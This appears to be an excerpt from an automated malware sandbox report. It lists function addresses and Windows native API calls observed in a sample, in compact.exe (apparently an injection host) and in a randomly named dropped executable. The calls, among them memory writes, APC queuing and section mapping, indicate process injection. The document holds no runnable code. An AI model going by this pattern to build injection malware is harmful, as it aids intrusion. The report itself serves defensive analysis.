          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03854650 NtSuspendThread,LdrInitializeThunk,5_2_03854650
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03852BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_03852BA0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03852BE0 NtQueryValueKey,LdrInitializeThunk,5_2_03852BE0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03852BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_03852BF0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03852B60 NtClose,LdrInitializeThunk,5_2_03852B60
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03852AD0 NtReadFile,LdrInitializeThunk,5_2_03852AD0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03852AF0 NtWriteFile,LdrInitializeThunk,5_2_03852AF0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03852FB0 NtResumeThread,LdrInitializeThunk,5_2_03852FB0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03852FE0 NtCreateFile,LdrInitializeThunk,5_2_03852FE0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03852F30 NtCreateSection,LdrInitializeThunk,5_2_03852F30
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03852E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_03852E80
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03852EE0 NtQueueApcThread,LdrInitializeThunk,5_2_03852EE0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03852DD0 NtDelayExecution,LdrInitializeThunk,5_2_03852DD0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03852DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_03852DF0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03852D10 NtMapViewOfSection,LdrInitializeThunk,5_2_03852D10
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03852D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_03852D30
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03852CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_03852CA0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03852C60 NtCreateKey,LdrInitializeThunk,5_2_03852C60
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03852C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_03852C70
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038535C0 NtCreateMutant,LdrInitializeThunk,5_2_038535C0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038539B0 NtGetContextThread,LdrInitializeThunk,5_2_038539B0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03852B80 NtQueryInformationFile,5_2_03852B80
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03852AB0 NtWaitForSingleObject,5_2_03852AB0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03852F90 NtProtectVirtualMemory,5_2_03852F90
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03852FA0 NtQuerySection,5_2_03852FA0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03852F60 NtCreateProcessEx,5_2_03852F60
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03852EA0 NtAdjustPrivilegesToken,5_2_03852EA0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03852E30 NtWriteVirtualMemory,5_2_03852E30
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03852DB0 NtEnumerateKey,5_2_03852DB0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03852D00 NtSetInformationFile,5_2_03852D00
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03852CC0 NtQueryVirtualMemory,5_2_03852CC0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03852CF0 NtOpenProcess,5_2_03852CF0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03852C00 NtQueryInformationProcess,5_2_03852C00
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03853090 NtSetValueKey,5_2_03853090
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03853010 NtOpenDirectoryObject,5_2_03853010
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03853D10 NtOpenProcessToken,5_2_03853D10
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03853D70 NtOpenThread,5_2_03853D70
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03108F40 NtReadFile,5_2_03108F40
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03108DD0 NtCreateFile,5_2_03108DD0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03109230 NtAllocateVirtualMemory,5_2_03109230
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03109030 NtDeleteFile,5_2_03109030
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_031090D0 NtClose,5_2_031090D0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_036FF901 NtClose,5_2_036FF901
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_00E084930_2_00E08493
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_00DF28E00_2_00DF28E0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_00DF31500_2_00DF3150
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_00DF11400_2_00DF1140
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_00DF113B0_2_00DF113B
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_00DF12F00_2_00DF12F0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_00E1EA830_2_00E1EA83
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_00DFFCFE0_2_00DFFCFE
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_00DF2CF30_2_00DF2CF3
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_00DFFD030_2_00DFFD03
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_00DF2D000_2_00DF2D00
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_00E0666E0_2_00E0666E
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_00E066730_2_00E06673
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_00DFDF9B0_2_00DFDF9B
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_00DFDFA30_2_00DFDFA3
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_00DFFF230_2_00DFFF23
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010201000_2_01020100
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010CA1180_2_010CA118
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010B81580_2_010B8158
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010F01AA0_2_010F01AA
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010E41A20_2_010E41A2
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010E81CC0_2_010E81CC
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010C20000_2_010C2000
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010EA3520_2_010EA352
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010F03E60_2_010F03E6
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0103E3F00_2_0103E3F0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010D02740_2_010D0274
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010B02C00_2_010B02C0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010305350_2_01030535
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010F05910_2_010F0591
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010D44200_2_010D4420
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010E24460_2_010E2446
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010DE4F60_2_010DE4F6
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010547500_2_01054750
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010307700_2_01030770
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102C7C00_2_0102C7C0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104C6E00_2_0104C6E0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010469620_2_01046962
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010329A00_2_010329A0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010FA9A60_2_010FA9A6
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0103A8400_2_0103A840
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010328400_2_01032840
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010168B80_2_010168B8
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105E8F00_2_0105E8F0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010EAB400_2_010EAB40
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010E6BD70_2_010E6BD7
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102EA800_2_0102EA80
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0103AD000_2_0103AD00
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010CCD1F0_2_010CCD1F
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01048DBF0_2_01048DBF
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102ADE00_2_0102ADE0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01030C000_2_01030C00
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010D0CB50_2_010D0CB5
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01020CF20_2_01020CF2
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01072F280_2_01072F28
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01050F300_2_01050F30
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010D2F300_2_010D2F30
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A4F400_2_010A4F40
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010AEFA00_2_010AEFA0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01022FC80_2_01022FC8
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010EEE260_2_010EEE26
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01030E590_2_01030E59
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01042E900_2_01042E90
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010ECE930_2_010ECE93
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010EEEDB0_2_010EEEDB
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010FB16B0_2_010FB16B
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0106516C0_2_0106516C
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0101F1720_2_0101F172
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0103B1B00_2_0103B1B0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010DF0CC0_2_010DF0CC
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010370C00_2_010370C0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010E70E90_2_010E70E9
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010EF0E00_2_010EF0E0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010E132D0_2_010E132D
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0101D34C0_2_0101D34C
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0107739A0_2_0107739A
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010352A00_2_010352A0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104B2C00_2_0104B2C0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010D12ED0_2_010D12ED
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104D2F00_2_0104D2F0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010E75710_2_010E7571
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010CD5B00_2_010CD5B0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010EF43F0_2_010EF43F
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010214600_2_01021460
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010EF7B00_2_010EF7B0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010E16CC0_2_010E16CC
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010C59100_2_010C5910
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010399500_2_01039950
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104B9500_2_0104B950
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0109D8000_2_0109D800
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010338E00_2_010338E0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010EFB760_2_010EFB76
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104FB800_2_0104FB80
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A5BF00_2_010A5BF0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0106DBF90_2_0106DBF9
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010EFA490_2_010EFA49
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010E7A460_2_010E7A46
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A3A6C0_2_010A3A6C
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010CDAAC0_2_010CDAAC
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01075AA00_2_01075AA0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010D1AA30_2_010D1AA3
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010DDAC60_2_010DDAC6
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01033D400_2_01033D40
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010E1D5A0_2_010E1D5A
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010E7D730_2_010E7D73
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104FDC00_2_0104FDC0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A9C320_2_010A9C32
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010EFCF20_2_010EFCF2
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010EFF090_2_010EFF09
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01031F920_2_01031F92
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010EFFB10_2_010EFFB1
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01039EB00_2_01039EB0
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeCode function: 2_2_034F4B772_2_034F4B77
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeCode function: 2_2_034F4B722_2_034F4B72
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeCode function: 2_2_034EE2072_2_034EE207
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeCode function: 2_2_034EE2022_2_034EE202
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeCode function: 2_2_034F69972_2_034F6997
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeCode function: 2_2_0350CF872_2_0350CF87
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeCode function: 2_2_034EE4272_2_034EE427
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeCode function: 2_2_034EC49F2_2_034EC49F
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeCode function: 2_2_034EC4A72_2_034EC4A7
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038E03E65_2_038E03E6
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_0382E3F05_2_0382E3F0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038DA3525_2_038DA352
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038A02C05_2_038A02C0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038C02745_2_038C0274
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038E01AA5_2_038E01AA
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038D41A25_2_038D41A2
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038D81CC5_2_038D81CC
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038101005_2_03810100
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038BA1185_2_038BA118
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038A81585_2_038A8158
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038B20005_2_038B2000
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_0381C7C05_2_0381C7C0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038447505_2_03844750
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038207705_2_03820770
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_0383C6E05_2_0383C6E0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038E05915_2_038E0591
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038205355_2_03820535
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038CE4F65_2_038CE4F6
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038C44205_2_038C4420
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038D24465_2_038D2446
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038D6BD75_2_038D6BD7
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038DAB405_2_038DAB40
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_0381EA805_2_0381EA80
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038229A05_2_038229A0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038EA9A65_2_038EA9A6
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038369625_2_03836962
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038068B85_2_038068B8
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_0384E8F05_2_0384E8F0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038228405_2_03822840
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_0382A8405_2_0382A840
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_0389EFA05_2_0389EFA0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03812FC85_2_03812FC8
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03862F285_2_03862F28
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03840F305_2_03840F30
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038C2F305_2_038C2F30
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03894F405_2_03894F40
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03832E905_2_03832E90
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038DCE935_2_038DCE93
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038DEEDB5_2_038DEEDB
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038DEE265_2_038DEE26
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03820E595_2_03820E59
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03838DBF5_2_03838DBF
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_0381ADE05_2_0381ADE0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_0382AD005_2_0382AD00
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038BCD1F5_2_038BCD1F
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038C0CB55_2_038C0CB5
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03810CF25_2_03810CF2
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03820C005_2_03820C00
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_0386739A5_2_0386739A
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038D132D5_2_038D132D
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_0380D34C5_2_0380D34C
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038252A05_2_038252A0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_0383B2C05_2_0383B2C0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038C12ED5_2_038C12ED
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_0383D2F05_2_0383D2F0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_0382B1B05_2_0382B1B0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038EB16B5_2_038EB16B
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_0385516C5_2_0385516C
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_0380F1725_2_0380F172
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038CF0CC5_2_038CF0CC
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038270C05_2_038270C0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038D70E95_2_038D70E9
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038DF0E05_2_038DF0E0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038DF7B05_2_038DF7B0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038D16CC5_2_038D16CC
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038656305_2_03865630
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038BD5B05_2_038BD5B0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038E95C35_2_038E95C3
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038D75715_2_038D7571
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038DF43F5_2_038DF43F
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038114605_2_03811460
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_0383FB805_2_0383FB80
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03895BF05_2_03895BF0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_0385DBF95_2_0385DBF9
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038DFB765_2_038DFB76
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03865AA05_2_03865AA0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038BDAAC5_2_038BDAAC
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038C1AA35_2_038C1AA3
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038CDAC65_2_038CDAC6
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038DFA495_2_038DFA49
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038D7A465_2_038D7A46
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03893A6C5_2_03893A6C
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038B59105_2_038B5910
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038299505_2_03829950
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_0383B9505_2_0383B950
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038238E05_2_038238E0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_0388D8005_2_0388D800
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03821F925_2_03821F92
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038DFFB15_2_038DFFB1
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038DFF095_2_038DFF09
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03829EB05_2_03829EB0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_0383FDC05_2_0383FDC0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03823D405_2_03823D40
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038D1D5A5_2_038D1D5A
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038D7D735_2_038D7D73
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038DFCF25_2_038DFCF2
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03899C325_2_03899C32
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_030F1A305_2_030F1A30
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_030ECB505_2_030ECB50
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_030EABC85_2_030EABC8
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_030EABD05_2_030EABD0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_030EC92B5_2_030EC92B
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_030EC9305_2_030EC930
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_030F329B5_2_030F329B
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_030F32A05_2_030F32A0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_030F50C05_2_030F50C0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_0310B6B05_2_0310B6B0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_036FE3855_2_036FE385
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_036FE1DC5_2_036FE1DC
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_036FE7235_2_036FE723
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_036FD7885_2_036FD788
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_036FCA335_2_036FCA33
          Source: C:\Windows\SysWOW64\compact.exeCode function: String function: 0388EA12 appears 86 times
          Source: C:\Windows\SysWOW64\compact.exeCode function: String function: 0380B970 appears 262 times
          Source: C:\Windows\SysWOW64\compact.exeCode function: String function: 03867E54 appears 107 times
          Source: C:\Windows\SysWOW64\compact.exeCode function: String function: 03855130 appears 58 times
          Source: C:\Windows\SysWOW64\compact.exeCode function: String function: 0389F290 appears 103 times
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: String function: 01065130 appears 58 times
